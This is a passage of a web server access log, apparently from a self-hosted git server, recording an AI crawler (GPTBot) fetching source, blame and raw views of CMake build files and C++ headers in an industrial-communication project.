74.7.227.38] [Length 6268] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:37:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9967] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:37:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11024] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:37:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15432] [Gzip 8.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:37:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 10237] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:37:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10818] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:37:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10818] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:37:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15142] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:37:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15229] [Gzip 5.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:37:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:37:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:37:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11577] [Gzip 3.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:37:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9984] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:37:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:37:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9971] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:37:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15251] [Gzip 5.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:37:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6463] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:37:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21619] [Gzip 28.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:37:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 10212] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:37:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9947] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:37:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15410] [Gzip 8.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:37:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 16770] [Gzip 7.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:37:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9959] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:37:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6268] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:37:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6463] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:37:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9944] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:37:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10794] [Gzip 3.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:37:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:37:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 11293] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:15:37:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 9988] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:15:37:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10219] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:37:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 9990] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:15:37:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 10447] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:15:37:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 10446] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:15:37:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 94] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:15:37:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:15:37:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 11398] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:37:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:15:37:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 12046] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:37:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13335] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:37:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 11598] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:37:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 94] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:15:37:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 94] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:15:37:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 879] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:15:37:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 11397] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:37:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:15:37:55 +0000] - 200 200 - GET https 